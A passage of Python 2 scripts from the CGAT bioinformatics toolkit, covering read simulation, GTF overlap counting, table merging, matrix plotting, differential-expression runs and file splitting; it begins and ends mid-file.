total_pids.append(pid)
sequence = new_sequence
else:
pid = 100.0
if options.loglevel >= 2:
options.stdlog.write(
"# processing %s - len=%i\n" % (id, lsequence))
options.stdlog.flush()
total_len += lsequence
lvsequence = lsequence * \
random.gauss(options.coverage_mean, options.coverage_stddev)
covered = 0
counts = numpy.zeros(lsequence)
nreads = 0
error_pids, read_lengths = [], []
while covered < lvsequence:
read_length = int(
random.gauss(options.read_length_mean, options.read_length_stddev))
positive = random.randint(0, 1)
if positive:
start = random.randint(0, lsequence)
end = min(lsequence, start + read_length)
else:
end = random.randint(0, lsequence)
start = max(0, end - read_length)
read_length = end - start
if read_length < options.min_read_length:
continue
segment = sequence[start:end]
if not positive:
segment = Genomics.complement(segment)
noutput += 1
if do_error:
new_segment = getMutatedSequence(segment, options.error_mean)
pid_calc.loadPair(segment, new_segment)
pid = pid_calc.mPID
error_pids.append(pid)
segment = new_segment
else:
pid = 100.0
options.stdout.write(
">%s\n%s\n" % (options.output_format_id % noutput, segment))
if outfile_map:
outfile_map.write(
"%s\t%s\n" % (id, options.output_format_id % noutput))
for x in range(start, end):
counts[x] += 1
nreads += 1
covered += read_length
read_lengths.append(read_length)
if options.loglevel >= 2:
options.stdout.write("# transcript %s: len=%i, nreads=%i, len_mean=%.2f, len_std=%.2f, cov_mean=%.2f, cov_stddev=%.2f\n" % (id,
lsequence,
nreads,
numpy.mean(
read_lengths),
numpy.std(
read_lengths),
numpy.mean(
counts),
numpy.std(counts)))
if outfile_stats:
outfile_stats.write("%s\t%i\t%i\t%.2f\t%.2f\t%.2f\t%.2f\n" % (id,
lsequence,
nreads,
numpy.mean(
read_lengths),
numpy.std(
read_lengths),
numpy.mean(
counts),
numpy.std(counts)))
total_counts += list(counts)
total_read_lengths += read_lengths
total_error_pids += error_pids
if options.test and ninput >= options.test:
break
if options.sample_size and ninput >= options.sample_size:
break
if options.loglevel >= 1:
output = ["len=%i, nreads=%i" % (total_len,
noutput)]
output.append("len_mean=%.2f, len_std=%.2f, cov_mean=%.2f, cov_stddev=%.2f" % (
numpy.mean(total_read_lengths),
numpy.std(total_read_lengths),
numpy.mean(total_counts),
numpy.std(total_counts)))
no_uncovered = [x for x in total_counts if x > 0]
output.append("cov0_mean=%.2f, cov0_stddev=%.2f" % (numpy.mean(no_uncovered),
numpy.std(no_uncovered)))
if do_mutate:
output.append("pid_mean=%.2f, pid_std=%.2f" %
(numpy.mean(total_pids), numpy.std(total_pids)))
if do_error:
output.append("pid_error_mean=%.2f, pid_error_std=%.2f" %
(numpy.mean(total_error_pids), numpy.std(total_error_pids)))
options.stdlog.write("# effective: %s\n" % ", ".join(output))
if options.loglevel >= 1:
options.stdlog.write(
"# ninput=%i, noutput=%i, nskipped=%i\n" % (ninput, noutput, nskipped))
E.Stop()
if __name__ == '__main__':
main()
```
#### File: cgat/scripts/gtfs2graph.py
```python
import sys
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
import bx.intervals.intersection
import numpy
class Counter:
mPercentFormat = "%5.2f"
def __init__(self, outfile):
self.mOutfile = outfile
def write(self, *args):
self.mOutfile.write("\t".join(args) + "\n")
def getHeader(self):
h = []
for a in ("genes", "exons", "bases"):
for b in ("total", "ovl", "unique"):
for c in ("1", "2"):
h.append("n" + a + "_" + b + c)
for a in ("genes", "exons", "bases"):
for b in ("ovl", "unique"):
for c in ("1", "2"):
h.append("p" + a + "_" + b + c)
return "\t".join(h)
@E.cachedmethod
def buildIndex(self, filename):
"""read and index."""
idx = {}
infile = open(filename, "r")
for e in GTF.readFromFile(infile):
if e.contig not in idx:
idx[e.contig] = bx.intervals.intersection.Intersecter()
idx[e.contig].add_interval(
bx.intervals.Interval(e.start, e.end, value=e))
infile.close()
return idx
def _count(self, filename, idx):
overlapping_genes = set()
genes = set()
# iterate over exons
infile = open(filename, "r")
it = GTF.iterator(infile)
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for this in it:
nexons += 1
nbases += this.end - this.start
genes.add(this.gene_id)
try:
intervals = idx[this.contig].find(this.start, this.end)
except KeyError:
continue
if len(intervals) == 0:
continue
overlapping_genes.add(this.gene_id)
nexons_overlapping += 1
start, end = this.start, this.end
counts = numpy.zeros(end - start, numpy.int)
for other in intervals:
for x in range(max(start, other.start) - start, min(end, other.end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
infile.close()
return len(genes), len(overlapping_genes), nexons, nexons_overlapping, nbases, nbases_overlapping
def run(self, filename1, filename2):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
(self.mGenes1, self.mGenesOverlapping1,
self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename1, idx2)
self.mGenesUnique1 = self.mGenes1 - self.mGenesOverlapping1
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx1 = self.buildIndex(filename1)
(self.mGenes2, self.mGenesOverlapping2,
self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._count(filename2, idx1)
self.mGenesUnique2 = self.mGenes2 - self.mGenesOverlapping2
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def __str__(self):
return "\t".join(map(str, (
self.mGenes1, self.mGenes2,
self.mGenesOverlapping1, self.mGenesOverlapping2,
self.mGenesUnique1, self.mGenesUnique2,
self.mExons1, self.mExons2,
self.mExonsOverlapping1, self.mExonsOverlapping2,
self.mExonsUnique1, self.mExonsUnique2,
self.mBases1, self.mBases2,
self.mBasesOverlapping1, self.mBasesOverlapping2,
self.mBasesUnique1, self.mBasesUnique2 ) ) ) + "\t" +\
"\t".join(map(lambda x: IOTools.prettyPercent(*x), (
(self.mGenesOverlapping1, self.mGenes1),
(self.mGenesOverlapping2, self.mGenes2),
(self.mGenesUnique1, self.mGenes1),
(self.mGenesUnique2, self.mGenes2),
(self.mExonsOverlapping1, self.mExons1),
(self.mExonsOverlapping2, self.mExons2),
(self.mExonsUnique1, self.mExons1),
(self.mExonsUnique2, self.mExons2),
(self.mBasesOverlapping1, self.mBases1),
(self.mBasesOverlapping2, self.mBases2),
(self.mBasesUnique1, self.mBases1),
(self.mBasesUnique2, self.mBases2))))
class CounterGenes(Counter):
"""output only genes."""
mSeparator = ";"
def __init__(self, *args, **kwargs):
Counter.__init__(self, *args, **kwargs)
def getHeader(self):
h = ["genes", "gene2"]
return "\t".join(h)
def _run(self, filename, idx):
# iterate over exons
infile = IOTools.openFile(filename, "r")
it = GTF.iterator(infile)
keys = set()
for this in it:
try:
intervals = idx[this.contig].find(this.start, this.end)
except KeyError:
continue
if len(intervals) == 0:
continue
for i in intervals:
key = "%s-%s" % (this.gene_id, i.value.gene_id)
if key not in keys:
self.write(this.gene_id, i.value.gene_id)
keys.add(key)
infile.close()
def run(self, filename1, filename2):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
self._run(filename1, idx2)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: gtfs2graph.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.add_option("-s", "--ignore-strand", dest="ignore_strand", action="store_true",
help="ignore strand information [default=%default].")
parser.add_option("-u", "--update", dest="filename_update", type="string",
help="if filename is given, previous results will be read from there and only changed sets will be computed [default=%default].")
parser.add_option("-p", "--pattern-identifier", dest="pattern_id", type="string",
help="pattern to convert a filename to an id [default=%default].")
parser.add_option("-g", "--genes-tsv-file", dest="genes", action="store_true",
help="only output gene stats (includes gene lists) [default=%default].")
parser.set_defaults(
ignore_strand=False,
filename_update=None,
pattern_id="(.*).gtf",
genes=False,
)
(options, args) = E.Start(parser)
if len(args) != 2:
print USAGE
raise ValueError("two arguments are required")
if options.genes:
counter = CounterGenes(options.stdout)
else:
counter = Counter(options.stdout)
options.stdout.write(counter.getHeader() + "\n")
counter.run(args[0], args[1])
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/merge_tables.py
```python
import sys
import string
import CGAT.Experiment as E
parser = E.OptionParser(
version="%prog version: $Id$")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser.add_option("-t", "--table", dest="tables", type="string",
help="tables to merge.",
action="append")
parser.set_defaults(
tables=[])
(options, args) = E.Start(parser)
if len(options.tables) < 1:
raise "please specify at least one table."
files = []
for t in options.tables:
files.append(open(t, "r"))
while 1:
frags = []
stop = False
for f in files:
l = f.readline()
if not l:
stop = True
break
frags.append(l[:-1])
if stop:
break
print string.join(frags, "\t")
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/plot_matrix.py
```python
import sys
import os
import numpy
import pylab
import CGAT.MatlabTools as MatlabTools
import CGAT.Experiment as E
param_grid_size_x = 6
param_hardcopy = "test.ps"
param_chunk_size = 2000
param_background = 255
def GetRange(matrix, r):
"""get ranges from a range string.
can be two numbers separated by comma, or min/max + a number
"""
rr = r.split(",")
if len(rr) != 2:
raise "please supply two values for range separated by a comma."
vv = []
for x in rr:
if x == "min":
v = min(matrix.flat)
elif x == "max":
v = max(matrix.flat)
else:
v = float(x)
vv.append(v)
return vv
def plotMatrix(matrix, color_scheme, row_headers, col_headers, vmin, vmax, options):
pylab.imshow(matrix,
cmap=color_scheme,
origin='lower',
vmax=vmax,
vmin=vmin,
interpolation='nearest')
# offset=0: x=center,y=center
# offset=0.5: y=top/x=right
offset = 0.0
if options.xticks:
pylab.xticks([offset + x for x in range(len(options.xticks))],
options.xticks,
rotation="vertical",
fontsize="8")
else:
if col_headers and len(col_headers) < 100:
pylab.xticks([offset + x for x in range(len(col_headers))],
col_headers,
rotation="vertical",
fontsize="8")
if options.yticks:
pylab.yticks([offset + y for y in range(len(options.yticks))],
options.yticks,
fontsize="8")
else:
if row_headers and len(row_headers) < 100:
pylab.yticks([offset + y for y in range(len(row_headers))],
row_headers,
fontsize="8")
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: plot_matrix.py 2782 2009-09-10 11:40:29Z andreas $")
parser.add_option("-c", "--columns", dest="columns", type="string",
help="columns to take from table.")
parser.add_option("-a", "--hardcopy", dest="hardcopy", type="string",
help="write hardcopy to file.", metavar="FILE")
parser.add_option("-f", "--file", dest="input_filename", type="string",
help="filename with table data.",
metavar="FILE")
parser.add_option("-p", "--plot", dest="plot", type="string",
help="plots to plot.",
action="append")
parser.add_option("-t", "--threshold", dest="threshold", type="float",
help="min threshold to use for counting method.")
parser.add_option("-o", "--colours", dest="colours", type="int",
help="column with colour information.")
parser.add_option("-l", "--plot-labels", dest="labels", type="string",
help="column labels for x and y in matched plots.")
parser.add_option("-e", "--header-names", dest="headers", action="store_true",
help="headers are supplied in matrix.")
parser.add_option("--no-headers", dest="headers", action="store_false",
help="headers are not supplied in matrix.")
parser.add_option("--normalize", dest="normalize", action="store_true",
help="normalize matrix.")
parser.add_option("--palette", dest="palette", type="choice",
choices=("rainbow", "gray", "blue-white-red",
"autumn", "bone", "cool", "copper", "flag", "gray", "hot", "hsv", "jet", "pink", "prism",
"spring", "summer", "winter", "spectral",
"RdBu", "RdGy", "BrBG", "BuGn", "Blues", "Greens", "Reds", "Oranges", "Greys"),
help="colour palette [default=%Default]")
parser.add_option("--reverse-palette", dest="reverse_palette", action="store_true",
help="reverse the palette [default=%default].")
parser.add_option("", "--xrange", dest="xrange", type="string",
help="xrange.")
parser.add_option("", "--yrange", dest="yrange", type="string",
help="yrange.")
parser.add_option("", "--zrange", dest="zrange", type="string",
help="zrange.")
parser.add_option("", "--xticks", dest="xticks", type="string",
help="xticks.")
parser.add_option("", "--yticks", dest="yticks", type="string",
help="yticks.")
parser.add_option("--bar-format", dest="bar_format", type="string",
help="format for ticks on colourbar.")
parser.add_option("--title", dest="title", type="string",
help="title to use.")
parser.add_option("--missing-value", dest="missing", type="float",
help="value to use for missing data.")
parser.add_option("--subplots", dest="subplots", type="string",
help="split matrix into several subplots. Supply number of rows and columns separated by a comma.")
parser.set_defaults(
hardcopy=None,
input_filename="-",
columns="all",
statistics=[],
plot=[],
threshold=0.0,
labels="x,y",
colours=None,
xrange=None,
yrange=None,
zrange=None,
palette=None,
reverse_palette=False,
xticks=None,
yticks=None,
normalize=False,
bar_format="%1.1f",
headers=True,
missing=None,
title=None,
subplots=None)
(options, args) = E.Start(parser)
# import matplotlib/pylab. Has to be done here
# for batch scripts without GUI.
import matplotlib
if options.hardcopy:
matplotlib.use("cairo")
import pylab
if len(args) > 0:
options.input_filename = ",".join(args)
if options.xticks:
options.xticks = options.xticks.split(",")
if options.yticks:
options.yticks = options.yticks.split(",")
if options.xrange:
options.xrange = map(float, options.xrange.split(","))
if options.yrange:
options.yrange = map(float, options.yrange.split(","))
if options.columns != "all":
options.columns = map(lambda x: int(x) - 1, options.columns.split(","))
filenames = options.input_filename.split(",")
if len(filenames) > 1:
nsubrows = (len(filenames) / 3) + 1
nsubcols = 3
elif options.subplots:
nsubrows, nsubcols = [int(x) for x in options.subplots.split(",")]
else:
nsubrows, nsubcols = 1, 1
nsubplots = nsubrows * nsubcols
# Setting up color maps
if options.palette:
if options.palette == "gray":
_gray_data = {'red': ((0., 1, 1), (1., 0, 0)),
'green': ((0., 1, 1), (1., 0, 0)),
'blue': ((0., 1, 1), (1., 0, 0))}
LUTSIZE = pylab.rcParams['image.lut']
colors_gray = matplotlib.colors.LinearSegmentedColormap(
'gray', _gray_data, LUTSIZE)
plot_id = 0
for filename in filenames:
plot_id += 1
pylab.subplot(nsubrows, nsubcols, plot_id)
if filename == "-":
infile = sys.stdin
else:
infile = open(filename, "r")
matrix, row_headers, col_headers = MatlabTools.readMatrix(infile,
numeric_type=numpy.float32,
take=options.columns,
headers=options.headers,
missing=options.missing)
if min(matrix.flat) == max(matrix.flat):
options.stderr.write("matrix is uniform - no plotting done.\n")
sys.exit(0)
if options.normalize:
v = max(matrix.flat)
matrix = matrix / v
if options.zrange:
options.zrange = GetRange(matrix, options.zrange)
nrows, ncols = matrix.shape
if options.palette:
if options.palette == "gray":
color_scheme = colors_gray
else:
if options.reverse_palette:
color_scheme = eval("pylab.cm.%s_r" % options.palette)
else:
color_scheme = eval("pylab.cm.%s" % options.palette)
else:
color_scheme = None
if options.zrange:
vmin, vmax = options.zrange
matrix[matrix < vmin] = vmin
matrix[matrix > vmax] = vmax
else:
vmin, vmax = None, None
if options.subplots:
if nsubcols > 1:
increment_x = int(float(nrows + 1) / nsubcols)
increment_y = nrows
x = 0
y = 0
for n in range(nsubplots):
pylab.subplot(nsubrows, nsubcols, plot_id)
plot_id += 1
print n, "rows=", nsubrows, "cols=", nsubcols, y, y + increment_y, x, x + increment_x
print matrix[y:y + increment_y, x:x + increment_x].shape
print matrix.shape
plotMatrix(matrix[y:y + increment_y, x:x + increment_x],
color_scheme,
row_headers[y:y + increment_y],
col_headers[x:x + increment_x],
0, 100, options)
x += increment_x
elif nsubrows > 1:
increment_x = int(float(ncols + 1) / nsubrows)
x = 0
for n in range(nsubplots):
pylab.subplot(nsubrows, nsubcols, plot_id)
plot_id += 1
plotMatrix(matrix[0:nrows, x:x + increment_x],
color_scheme,
row_headers,
col_headers[x:x + increment_x],
vmin, vmax, options)
x += increment_x
else:
plotMatrix(
matrix, color_scheme, row_headers, col_headers, vmin, vmax, options)
if options.xrange:
pylab.xlim(options.xrange)
if options.yrange:
pylab.ylim(options.yrange)
if options.labels:
xlabel, ylabel = options.labels.split(",")
pylab.xlabel(xlabel)
pylab.ylabel(ylabel)
if not options.subplots:
pylab.colorbar(format=options.bar_format)
if options.title is None or options.title != "":
pylab.title(filename)
if options.hardcopy:
pylab.savefig(os.path.expanduser(options.hardcopy))
else:
pylab.show()
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/runExpression.py
```python
import sys
import os
import tempfile
from rpy2.robjects import r as R
import rpy2.robjects.numpy2ri
import CGAT.Experiment as E
import CGAT.Expression as Expression
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--tags-tsv-file", dest="input_filename_tags",
type="string",
help="input file with tag counts [default=%default].")
parser.add_option(
"--result-tsv-file", dest="input_filename_result",
type="string",
help="input file with results (for plotdetagstats) "
"[default=%default].")
parser.add_option("-d", "--design-tsv-file", dest="input_filename_design",
type="string",
help="input file with experimental design "
"[default=%default].")
parser.add_option("-o", "--outfile", dest="output_filename", type="string",
help="output filename [default=%default].")
parser.add_option("-m", "--method", dest="method", type="choice",
choices=(
"deseq", "edger", "deseq2",
"ttest",
"mock", "summary",
"dump", "spike",
"plottagstats",
"plotdetagstats"),
help="differential expression method to apply "
"[default=%default].")
parser.add_option("--deseq-dispersion-method",
dest="deseq_dispersion_method",
type="choice",
choices=("pooled", "per-condition", "blind"),
help="dispersion method for deseq [default=%default].")
parser.add_option("--deseq-fit-type", dest="deseq_fit_type", type="choice",
choices=("parametric", "local"),
help="fit type for deseq [default=%default].")
parser.add_option("--deseq-sharing-mode",
dest="deseq_sharing_mode",
type="choice",
choices=("maximum", "fit-only", "gene-est-only"),
help="deseq sharing mode [default=%default].")
parser.add_option(
"--edger-dispersion",
dest="edger_dispersion", type="float",
help="dispersion value for edgeR if there are no replicates "
"[default=%default].")
parser.add_option("-f", "--fdr", dest="fdr", type="float",
help="fdr to apply [default=%default].")
parser.add_option("-p", "--pseudocounts", dest="pseudo_counts",
type="float",
help="pseudocounts to add for mock analyis "
"[default=%default].")
parser.add_option("-R", "--output-R-code", dest="save_r_environment",
type="string",
help="save R environment [default=%default].")
parser.add_option("-r", "--reference-group", dest="ref_group",
type="string",
help="Group to use as reference to compute "
"fold changes against [default=$default]")
parser.add_option("--filter-min-counts-per-row",
dest="filter_min_counts_per_row",
type="int",
help="remove rows with less than this "
"number of counts in total [default=%default].")
parser.add_option("--filter-min-counts-per-sample",
dest="filter_min_counts_per_sample",
type="int",
help="remove samples with a maximum count per sample of "
"less than this number [default=%default].")
parser.add_option("--filter-percentile-rowsums",
dest="filter_percentile_rowsums",
type="int",
help="remove percent of rows with "
"lowest total counts [default=%default].")
parser.add_option("--deseq2-design-formula",
dest="model",
type="string",
help="Design formula for DESeq2")
parser.add_option("--deseq2-contrasts",
dest="contrasts",
type="string",
help=("contrasts for post-hoc testing writen"
" variable:control:treatment,..."))
parser.add_option("--deseq2-plot",
dest="plot",
type="int",
help=("draw plots during deseq2 analysis"))
parser.set_defaults(
input_filename_tags=None,
input_filename_result=None,
input_filename_design=None,
output_filename=sys.stdout,
method="deseq",
fdr=0.1,
deseq_dispersion_method="pooled",
deseq_fit_type="parametric",
deseq_sharing_mode="maximum",
edger_dispersion=0.4,
ref_group=None,
save_r_environment=None,
filter_min_counts_per_row=1,
filter_min_counts_per_sample=10,
filter_percentile_rowsums=0,
pseudo_counts=0,
spike_foldchange_max=4.0,
spike_expression_max=5.0,
spike_expression_bin_width=0.5,
spike_foldchange_bin_width=0.5,
spike_max_counts_per_bin=50,
model=None,
plot=1
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv, add_output_options=True)
if options.input_filename_tags == "-":
fh = tempfile.NamedTemporaryFile(delete=False)
fh.write("".join([x for x in options.stdin]))
fh.close()
options.input_filename_tags = fh.name
else:
fh = None
# load tag data and filter
if options.method in ("deseq2", "deseq", "edger", "mock", "ttest"):
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
assert options.input_filename_design and os.path.exists(
options.input_filename_design)
Expression.loadTagData(options.input_filename_tags,
options.input_filename_design)
nobservations, nsamples = Expression.filterTagData(
filter_min_counts_per_row=options.filter_min_counts_per_row,
filter_min_counts_per_sample=options.filter_min_counts_per_sample,
filter_percentile_rowsums=options.filter_percentile_rowsums)
if nobservations == 0:
E.warn("no observations - no output")
return
if nsamples == 0:
E.warn("no samples remain after filtering - no output")
return
sample_names = R('''colnames(countsTable)''')
E.info("%i samples to test at %i observations: %s" %
(nsamples, nobservations,
",".join(sample_names)))
try:
if options.method == "deseq2":
Expression.runDESeq2(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
ref_group=options.ref_group,
model=options.model,
contrasts=options.contrasts,
plot=options.plot
)
elif options.method == "deseq":
Expression.runDESeq(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
dispersion_method=options.deseq_dispersion_method,
fit_type=options.deseq_fit_type,
sharing_mode=options.deseq_sharing_mode,
ref_group=options.ref_group,
)
elif options.method == "edger":
Expression.runEdgeR(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr,
ref_group=options.ref_group,
dispersion=options.edger_dispersion)
elif options.method == "mock":
Expression.runMockAnalysis(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
ref_group=options.ref_group,
pseudo_counts=options.pseudo_counts,
)
elif options.method == "summary":
Expression.outputTagSummary(
options.input_filename_tags,
options.stdout,
options.output_filename_pattern,
filename_design=options.input_filename_design
)
elif options.method == "dump":
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
Expression.dumpTagData(options.input_filename_tags,
options.input_filename_design,
outfile=options.stdout)
elif options.method == "plottagstats":
assert options.input_filename_tags and os.path.exists(
options.input_filename_tags)
Expression.plotTagStats(
options.input_filename_tags,
options.input_filename_design,
outfile_prefix=options.output_filename_pattern)
elif options.method == "plotdetagstats":
assert options.input_filename_result and os.path.exists(
options.input_filename_result)
Expression.plotDETagStats(
options.input_filename_result,
outfile_prefix=options.output_filename_pattern)
elif options.method == "spike":
Expression.outputSpikeIns(
options.input_filename_tags,
options.stdout,
options.output_filename_pattern,
filename_design=options.input_filename_design,
foldchange_max=options.spike_foldchange_max,
expression_max=options.spike_expression_max,
max_counts_per_bin=options.spike_max_counts_per_bin,
expression_bin_width=options.spike_expression_bin_width,
foldchange_bin_width=options.spike_foldchange_bin_width,
)
elif options.method == "ttest":
Expression.runTTest(
outfile=options.output_filename,
outfile_prefix=options.output_filename_pattern,
fdr=options.fdr)
except rpy2.rinterface.RRuntimeError:
if options.save_r_environment:
E.info("saving R image to %s" % options.save_r_environment)
R['save.image'](options.save_r_environment)
raise
if fh and os.path.exists(fh.name):
os.unlink(fh.name)
if options.save_r_environment:
R['save.image'](options.save_r_environment)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_file.py
```python
import sys
import re
import string
import os
import getopt
import CGAT.Experiment as E
USAGE = """python %s < stdin > stdout
split a file into chunks.
OPTIONS:
-h, --help print this message.
-v, --verbose= loglevel.
-r, --split-regex split at regular expression
-a, --after split after match
-s, --skip do not echo match
-p, --pattern-output pattern of output files (has to contain %s)
-c, --column= split according to column
-m, --map= split according to map
-d, --dry-run echo files that would be created,
but do not create any.
-e, --header-names add header to each file
-r, --remove-key remove key column
-append append data to existing files.
--pattern-identifier if given, use this pattern to extract
id from column.
--chunk-size Number of matching records in each output file
--version output version information
""" % (sys.argv[0], "s")
def CreateOpen(file, mode="w", dry_run=False, header=None):
"""open file. Check first, if directory exists.
"""
if dry_run:
print "# opening file %s" % file
return open("/dev/null", mode)
if mode in ("w", "a"):
dirname = os.path.dirname(file)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if os.path.exists(file):
existed = True
else:
existed = False
f = open(file, mode)
if header and not existed:
f.write(header + "\n")
return f
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
param_long_options = [
"verbose=", "help", "split-regex=", "after", "pattern-output=", "skip",
"column=", "map=", "dry-run",
"header", "remove-key", "append", "pattern-identifier=", "version",
"chunk-size="]
param_short_options = "v:hr:ap:sc:dek"
param_loglevel = 1
param_split_at_regex = None
param_after = None
param_skip = None
param_pattern_output = "%s.chunk"
param_split_column = None
param_filename_map = None
param_dry_run = False
param_header = False
param_remove_key = False
param_append = "w"
param_pattern_identifier = None
param_chunk_size = 1
try:
optlist, args = getopt.getopt(sys.argv[1:],
param_short_options,
param_long_options)
except getopt.error, msg:
print USAGE, msg
sys.exit(1)
for o, a in optlist:
if o in ("-v", "--verbose"):
param_loglevel = int(a)
elif o in ("--version", ):
print "version="
sys.exit(0)
elif o in ("-h", "--help"):
print USAGE
sys.exit(0)
elif o in ("-r", "--split-regex"):
param_split_at_regex = re.compile(a)
elif o in ("-a", "--after"):
param_after = 1
elif o in ("-s", "--skip"):
param_skip = 1
elif o in ("-p", "--pattern-output"):
param_pattern_output = a
elif o in ("-c", "--column"):
param_split_column = int(a) - 1
elif o in ("-m", "--map"):
param_filename_map = a
elif o in ("-d", "--dry-run"):
param_dry_run = True
elif o in ("-e", "--header-names"):
param_header = True
elif o in ("-r", "--remove-key"):
param_remove_key = True
elif o == "--append":
param_append = "a"
elif o == "--pattern-identifier":
param_pattern_identifier = re.compile(a)
elif o == "--chunk-size":
param_chunk_size = int(a)
print E.GetHeader()
print E.GetParams()
mymap = {}
if param_filename_map:
infile = open(param_filename_map, "r")
for line in infile:
if line[0] == "#":
continue
data = line[:-1].split("\t")[:2]
mymap[data[0]] = data[1]
filenames = set()
found = set()
ninput, noutput = 0, 0
if param_split_column is not None:
header = None
files = {}
for line in sys.stdin:
if line[0] == "#":
continue
ninput += 1
if param_header:
if not header:
header = line[:-1]
continue
else:
header = None
data = line[:-1].split("\t")
try:
key = data[param_split_column]
except ValueError:
continue
if param_pattern_identifier:
key = param_pattern_identifier.search(key).groups()[0]
if mymap:
if key in mymap:
key = mymap[key]
else:
continue
found.add(key)
filename = re.sub("%s", key, param_pattern_output)
filenames.add(filename)
if filename not in files:
# reset if too many files are open
if len(files) > 1000:
if param_loglevel >= 1:
print "# resetting all files."
sys.stdout.flush()
for f in files.values():
f.close()
files = {}
files[filename] = CreateOpen(
filename, "a", param_dry_run, header)
if param_remove_key:
del data[param_split_column]
files[filename].write(string.join(data, "\t") + "\n")
else:
files[filename].write(line)
noutput += 1
for f in files.values():
f.close()
else:
file_id = 0
filename = re.sub("%s", str(file_id), param_pattern_output)
outfile = CreateOpen(filename, param_append, param_dry_run)
nlines = 0
header = param_header
split = 0
for line in sys.stdin:
if param_split_at_regex and param_split_at_regex.search(line[:-1]):
split += 1
if split == param_chunk_size:
if param_after:
nlines += 1
outfile.write(line)
if nlines > 0:
outfile.close()
file_id += 1
filename = re.sub("%s", str(file_id), param_pattern_output)
outfile = CreateOpen(
filename, param_append, param_dry_run, header)
filenames.add(filename)
split = 0
nlines = 0
if param_after or param_skip:
continue
outfile.write(line)
nlines += 1
outfile.close()
if param_loglevel >= 1:
sys.stdout.write(
"# ninput=%i, noutput=%i, nfound=%i, nnotfound=%i, nfiles=%i\n" % (
ninput,
noutput,
len(found),
len(set(mymap).difference(found)),
len(filenames)))
print E.GetFooter()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_gff.py
```python
import sys
import os
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
class OutputChunk:
def __init__(self, output_filename_pattern, dry_run=False):
self.nchunk = 0
self.output_filename_pattern = output_filename_pattern
self.dry_run = dry_run
def createOpen(self, mode="w", header=None):
"""open file. Check first, if directory exists.
"""
self.nchunk += 1
filename = self.output_filename_pattern % self.nchunk
if self.dry_run:
E.info("opening file %s" % filename)
return open("/dev/null", mode)
if mode in ("w", "a"):
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if os.path.exists(filename):
existed = True
else:
existed = False
f = IOTools.openFile(filename, mode)
if header and not existed:
f.write(header + "\n")
return f
def __call__(self, chunk):
"""output a chunk into a new file."""
outfile = self.createOpen()
for c in chunk:
outfile.write(str(c) + "\n")
outfile.close()
return len(chunk)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option(
"-i", "--min-chunk-size", dest="min_chunk_size", type="int",
help="minimum chunk size [default=%default].")
parser.add_option(
"-n", "--dry-run", dest="dry_run", action="store_true",
help="do not create any files [default=%default].")
parser.set_defaults(
method="overlap",
dry_run=False,
min_chunk_size=2,
output_filename_pattern="%06i.chunk",
)
(options, args) = E.Start(parser, add_output_options=True)
gffs = GTF.iterator(options.stdin)
ninput, noutput, nchunks = 0, 0, 0
outputChunk = OutputChunk(options.output_filename_pattern,
dry_run=options.dry_run)
if options.method == "overlap":
last_contig, last_to = None, None
chunk = []
for gff in gffs:
ninput += 1
if len(chunk) >= options.min_chunk_size and \
(gff.contig != last_contig or
gff.start > last_to):
noutput += outputChunk(chunk)
nchunks += 1
chunk = []
last_contig, last_to = gff.contig, gff.end
chunk.append(gff)
last_to = max(gff.end, last_to)
noutput += outputChunk(chunk)
nchunks += 1
E.info("ninput=%i, noutput=%i, nchunks=%i" % (ninput, noutput, nchunks))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/split_links.py
```python
import os
import sys
import re
import CGAT.Experiment as E
open_files = {}
def WriteLine(a, b, line, prefix="%s-%s"):
key1 = prefix % (a, b)
